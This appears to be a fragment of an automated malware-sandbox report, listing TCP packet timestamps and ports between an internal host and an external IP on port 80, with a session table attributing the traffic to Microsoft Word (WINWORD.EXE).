Jun 7, 2022 19:44:36.943826914 CEST | 49173 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:36.961354017 CEST | 49173 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:36.991600990 CEST | 80 | 49173 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:36.991637945 CEST | 80 | 49173 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.030510902 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.058628082 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.058744907 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.058758974 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.058788061 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.058864117 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.058901072 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.058957100 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.058991909 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.059087992 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.059122086 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.201658010 CEST | 49173 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.435573101 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.463280916 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.463632107 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.473567963 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.501120090 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.501225948 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.536554098 CEST | 49172 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.564064980 CEST | 80 | 49172 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.579617977 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.607300997 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.607443094 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.778932095 CEST | 49172 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.834969997 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.863265038 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.863425970 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:45:37.891575098 CEST | 49172 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:45:40.323673010 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:45:41.990484953 CEST | 80 | 49173 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:45:41.990658045 CEST | 49173 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:45:41.990782976 CEST | 49173 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:45:42.018299103 CEST | 80 | 49173 | 185.234.247.119 | 192.168.2.22 |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49171 | 185.234.247.119 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 7, 2022 19:44:27.187803030 CEST | 1 | OUT | |
Jun 7, 2022 19:44:27.215137959 CEST | 2 | IN | |
Jun 7, 2022 19:44:37.030510902 CEST | 4 | OUT | |
Jun 7, 2022 19:44:37.058628082 CEST | 5 | IN |